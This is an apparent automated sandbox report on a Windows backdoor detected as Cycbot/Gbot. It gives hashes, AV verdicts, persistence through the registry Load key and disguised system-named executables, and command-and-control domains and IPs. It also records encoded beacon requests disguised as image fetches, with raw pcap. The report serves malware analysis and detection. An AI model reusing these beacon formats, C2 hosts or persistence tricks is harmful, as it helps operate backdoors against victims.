Analysis Date2015-01-17 13:31:04
MD59fec99e8c3988036a41b09226601f3b7
SHA116b40b8fcc4efdcd49731c0be20badfa6b8ba64e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: fb2dffe70697aebf26b16e10dfc7ec8c sha1: cd3cafbc1a55e6f8f482e0bf7b1218abd69ac777 size: 105472
Section.rdata md5: e81a055cdcfb84f33ffe89e59f81b94c sha1: 7b3b8a1f5a85e72c00210467cc0f9f58ea37f2e7 size: 1024
Section.data md5: 8b70c379635a772a0e487c11014cdee0 sha1: 597ece7b7a3b09c51fcee3059d0005f851d0048d size: 23040
Section.rsrc md5: 710582cabb2edf5e8b166286ea1ae341 sha1: 2160016c65bbc7fb438f781078c1fadbc7693815 size: 1024
Timestamp2005-09-19 21:36:43
VersionPrivateBuild: 1113
PEhashdeb124207f040a1fb31a7a4fbe63acad2e4ca613
IMPhash3d5a10fa61498acb13b5a00c7145c6e8
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebTrojan.DownLoader1.42568
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdolbyaudiodevice.com
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSsharewareconnection.com
Winsock DNSzonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSzonejm.com
Type: A
23.239.15.54
DNSsharewareconnection.com
Type: A
216.240.159.81
DNSwww.google.com
Type: A
173.194.37.81
DNSwww.google.com
Type: A
173.194.37.80
DNSwww.google.com
Type: A
173.194.37.84
DNSwww.google.com
Type: A
173.194.37.83
DNSwww.google.com
Type: A
173.194.37.82
DNSzoneck.com
Type: A
208.79.234.132
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSxibudific.cn
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUzyvw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51AortCC5IaGUUmp1NLyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://sharewareconnection.com/images/ubar_1.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUzyvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUzyvw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUr1%2BjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUr1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1033 ➝ 216.240.159.81:80
Flows TCP192.168.1.1:1034 ➝ 173.194.37.81:80
Flows TCP192.168.1.1:1035 ➝ 173.194.37.81:80
Flows TCP192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1038 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1039 ➝ 208.79.234.132:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 75626172   GET /images/ubar
0x00000010 (00016)   5f312e6a 70673f74 713d6750 34614b79   _1.jpg?tq=gP4aKy
0x00000020 (00032)   646c7849 4155516a 4c643131 4a456757   dlxIAUQjLd11JEgW
0x00000030 (00048)   46326130 42366872 2532426b 4656334c   F2a0B6hr%2BkFV3L
0x00000040 (00064)   536b7625 32427675 737a4748 45416c56   Skv%2BvuszGHEAlV
0x00000050 (00080)   584f6c67 644b4a70 69646f39 4f66504a   XOlgdKJpido9OfPJ
0x00000060 (00096)   71486877 676e4162 43577852 4f743648   qHhwgnAbCWxROt6H
0x00000070 (00112)   78325035 4a687535 76354948 3158686a   x2P5Jhu5v5IH1Xhj
0x00000080 (00128)   73563566 71477334 4b6b586d 7a4b3879   sV5fqGs4KkXmzK8y
0x00000090 (00144)   656b6f49 536a544e 79314879 3630454b   ekoISjTNy1Hy60EK
0x000000a0 (00160)   47646b5a 55463774 4b484278 37427a25   GdkZUF7tKHBx7Bz%
0x000000b0 (00176)   32466d41 32322532 46342532 424d7935   2FmA22%2F4%2BMy5
0x000000c0 (00192)   756d6d65 416d2532 42496f46 6d4b3068   ummeAm%2BIoFmK0h
0x000000d0 (00208)   4d6d3359 73356d56 52794371 5a493366   Mm3Ys5mVRyCqZI3f
0x000000e0 (00224)   3474464b 25324639 64676638 4f4c6f25   4tFK%2F9dgf8OLo%
0x000000f0 (00240)   32466739 58704144 515a6564 6f69554e   2Fg9XpADQZedoiUN
0x00000100 (00256)   6d384975 4c355448 50366a67 75696455   m8IuL5THP6jguidU
0x00000110 (00272)   6a4c486f 30346d62 754c6a25 32467934   jLHo04mbuLj%2Fy4
0x00000120 (00288)   30487736 34677a46 69466537 5a4e3169   0Hw64gzFiFe7ZN1i
0x00000130 (00304)   66496657 784c7037 76495032 39693364   fIfWxLp7vIP29i3d
0x00000140 (00320)   70253246 25324672 4f653435 34727970   p%2F%2FrOe454ryp
0x00000150 (00336)   4951376c 61506949 6d4e4261 6b783643   IQ7laPiImNBakx6C
0x00000160 (00352)   30754133 38645a34 54506a39 65685674   0uA38dZ4TPj9ehVt
0x00000170 (00368)   34524952 5950324a 74594239 4e253246   4RIRYP2JtYB9N%2F
0x00000180 (00384)   3358504d 5577314b 49485063 37356351   3XPMUw1KIHPc75cQ
0x00000190 (00400)   50747833 6c51667a 69425152 7a4e795a   Ptx3lQfziBQRzNyZ
0x000001a0 (00416)   4f64586b 37756375 55434a73 4a563567   OdXk7ucuUCJsJV5g
0x000001b0 (00432)   6d543771 5a493368 76595669 6577616f   mT7qZI3hvYViewao
0x000001c0 (00448)   49385664 25324262 35774451 4c6f5436   I8Vd%2Bb5wDQLoT6
0x000001d0 (00464)   25324634 6b476454 736a7142 6a32467a   %2F4kGdTsjqBj2Fz
0x000001e0 (00480)   4b505055 73634f67 6b645535 66596234   KPPUscOgkdU5fYb4
0x000001f0 (00496)   6a4f3042 52746820 48545450 2f312e30   jO0BRth HTTP/1.0
0x00000200 (00512)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000210 (00528)   6f73650d 0a486f73 743a2073 68617265   ose..Host: share
0x00000220 (00544)   77617265 636f6e6e 65637469 6f6e2e63   wareconnection.c
0x00000230 (00560)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000240 (00576)   0a557365 722d4167 656e743a 2067626f   .User-Agent: gbo
0x00000250 (00592)   742f322e 330d0a0d 0a                  t/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a797677 3861336e 4e514c61   rCSUzyvw8a3nNQLa
0x00000040 (00064)   626e5673 4d4c456c 6c733072 4e613178   bnVsMLElls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 4e4c7979 5a4a7174   IaGUUmp1NLyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 4e4c7979 5a4a7174   IaGUUmp1NLyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 31416f72 74434335   K7Ql6TH51AortCC5
0x00000070 (00112)   49614755 556d7031 4e4c7979 5a4a7174   IaGUUmp1NLyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a797677 3861336e 4f514c61   rCiUzyvw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 2f322e33   gbot/2.3..../2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a797677 3861336e 4f514c61   rCiUzyvw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a3e54 68697320 69732074   .3....>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 76495032 39693364   </html>.vIP29i3d
0x00000140 (00320)   70253246 25324672 4f653435 34727970   p%2F%2FrOe454ryp
0x00000150 (00336)   4951376c 61506949 6d4e4261 6b783643   IQ7laPiImNBakx6C
0x00000160 (00352)   30754133 38645a34 54506a39 65685674   0uA38dZ4TPj9ehVt
0x00000170 (00368)   34524952 5950324a 74594239 4e253246   4RIRYP2JtYB9N%2F
0x00000180 (00384)   3358504d 5577314b 49485063 37356351   3XPMUw1KIHPc75cQ
0x00000190 (00400)   50747833 6c51667a 69425152 7a4e795a   Ptx3lQfziBQRzNyZ
0x000001a0 (00416)   4f64586b 37756375 55434a73 4a563567   OdXk7ucuUCJsJV5g
0x000001b0 (00432)   6d543771 5a493368 76595669 6577616f   mT7qZI3hvYViewao
0x000001c0 (00448)   49385664 25324262 35774451 4c6f5436   I8Vd%2Bb5wDQLoT6
0x000001d0 (00464)   25324634 6b476454 736a7142 6a32467a   %2F4kGdTsjqBj2Fz
0x000001e0 (00480)   4b505055 73634f67 6b645535 66596234   KPPUscOgkdU5fYb4
0x000001f0 (00496)   6a4f3042 52746820 48545450 2f312e30   jO0BRth HTTP/1.0
0x00000200 (00512)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000210 (00528)   6f73650d 0a486f73 743a2073 68617265   ose..Host: share
0x00000220 (00544)   77617265 636f6e6e 65637469 6f6e2e63   wareconnection.c
0x00000230 (00560)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000240 (00576)   0a557365 722d4167 656e743a 2067626f   .User-Agent: gbo
0x00000250 (00592)   742f322e 330d0a0d 0a                  t/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 72312532 426a6277 76675339   fBvUr1%2BjbwvgS9
0x00000040 (00064)   31375636 35724a71 6c4c6667 50695757   17V65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a206d 6f746865 72626f61   .Host: motherboa
0x00000080 (00128)   72647374 6573742e 636f6d0d 0a416363   rdstest.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000000b0 (00176)   0d0a746c 653e0a20 203c2f68 6561643e   ..tle>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 72312532 426a6277 76675339   fBvUr1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a 6f742f32 2e330d0a   /2.3....ot/2.3..
0x000000b0 (00176)   0d0a746c 653e0a20 203c2f68 6561643e   ..tle>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
6o

040904b0
1113
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
1Pf1vwYf.
4qw0s&
5~,}cKg
5~dXj. 
5]&OO^
5uT9U(
5$XhK[
_66jP4:
7LI8&X
'7LJ_"
7qI(CH
89<V,`
8gX&Xo
&8*M87
9dXydX
9=lxm)EXj
9M'XDX
bzp[uL~H
c4C?Rz
ccNc	7
cH'eX]%X
cHz27k
Cj+7Nhd`
c=jY_R
CkyE08;l
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
'^_c_s
,.D`&[<
@.data
DeleteCriticalSection
-D;k+p
dNN48*	
['dS#j
=dvFX5
dX(7xC
DX9FX[
<DX9/S
dXFX%X
DX[Mw]
DXvIDXU
[dX^%X
DX&XFX
,DX*zn
dyrf/r
e8$O+ 
]EL1rw<|*
EnterCriticalSection
EnumResourceNamesA
E_Or H#
<	~EX`
EX(EX\@
EXEX>&X
eXFX$X
]eXidX
ExitProcess
eXMEXEX
eXNFX#
eXxFXw
EXZ&XdX|
FindClose
FindFirstFileW
FreeEnvironmentStringsA
~~FX{@
^?FXdX
,FX~eX!
^FXfX[@
FXGXfX*U
+fXh;h
FXN&X.
fX$XEX
g0CoM;p/
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
[}+.GX
GX-4EXKDXi
=GXeX~
GX}EX`
>gXj+y
GXmku<
GX$X;<
HDXHxr
]HfX_{TY
hhLibr
hhLoca
HL:&X-
HwhkBv
*iA@r@
idXwGX
%IgmX>
ik&XFX/
ImvKX~
InitializeCriticalSection
'IST]TI
I~^	%X;
i%X^{x
jFXKvU
JnK'X[V1
<J	y<W
K&[*2`
KERNEL32.dll
kH'X8t
k+M'X^T
{k`SnB
:KT8DX%X
k'XH\x
KygXeX
LeaveCriticalSection
}leXoi
\l-lEX
LoadLibraryA
LresultFromObject
M9\%XeX
?M,hm{Z
ML:$;^30
;!mQp<
M?R	B$
m\%XJjC
N2z=lE
NH[0Hqh
n(@S9K
OGXK+DXnH72
OLEACC.dll
ON/Kp<
oym(-!
Pa+s}=Fv
!P.ObL{3
psR2HC
r}2zin
`.rdata
ReadFile
ReleaseSemaphore
r(hNd@
rJM33V
rw8bPG
SetEndOfFile
SetEvent
SetFilePointer
s=Q4*|>
!This program cannot be run in DOS mode.
t&KfUS
t$Xl9N
t^'Xtk
u:3@#?
uDXV{Q
u$h_^@
UiY[Y5=
|u#$*m
\uY6\^k
=v2{5@
Vm]\JB
?{<Vp5
WaitForMultipleObjects
WaitForSingleObject
WkL&Xz8
wNc5'IL
w}qDaxX
WriteFile
</w%X*4J@
wX:($X
?+)$X}
&X)},~`
]'X467
X6k(Mo
X.7=Im)
X7$X,+
X8gX-P
XDXnEX
XdXT7u
:?XEX_^
'X{EXC
XEXDXfX 
XeX}GX
X\EX^k
XeXL|9
XeX$X=7/
XEX%X8
X?eXY:c
XEXYEX
XFXJ%X
XfX*kw
X>FXZN
XGXFX0
XGXJFX5nij6n2
XGXmGX_GX+
XgX(Wc
$XGXwtr
X{gX$X
:XhhlAll
X*H;Lk
,/XHw6
XiWJ<vnA
X)I}yj
&X_k|~
X;<K5_
	&Xk[c
$X.K[x
(=/XL)
XleX{<V:
&XMt'X0
XmVY&X
Xm%X{P
Xm$X'X
%XM\<Y@
%XN(EX
XNFXeX
XN:gXw0
X{O=fX<
XOgXeX
>_(&XT
%XTJGX
XTWGXI
Xu5;8)
X_~u$X
]*'XVB
XWgXGX
XW=K&X
%XWX,C
(<:%X&X
&X;>X_
%X'X*_
X*)&X4
X<%X5EX
X$X7FX
X_X\dXy
X|&XEX
X&XeX7r
X%XeXP
X]&XhdX
X$X~)M
X%XN:K
X'XNy9Y
X'XnZs
X>X|VN
X&X%X0
X'X%XZ
X~'Xyh
X$X\Yu
XY7Lhq
XYEXFXFX
XY\fXc
XyFXgX
X{	Yi*
XY}Lwa
X:Y{]s
XYy*WOk	
XyY%Xu
XZ	=gX
XZ<KGX-t
X)z~_t
X>:|Zz
-/Y>gX%XV
Y$XdX;
z6u$Xm
ZA2wCEp
zcd8j6
ZEXJ]#
$Z:J"@!
zJI,4R
$/ZYvn=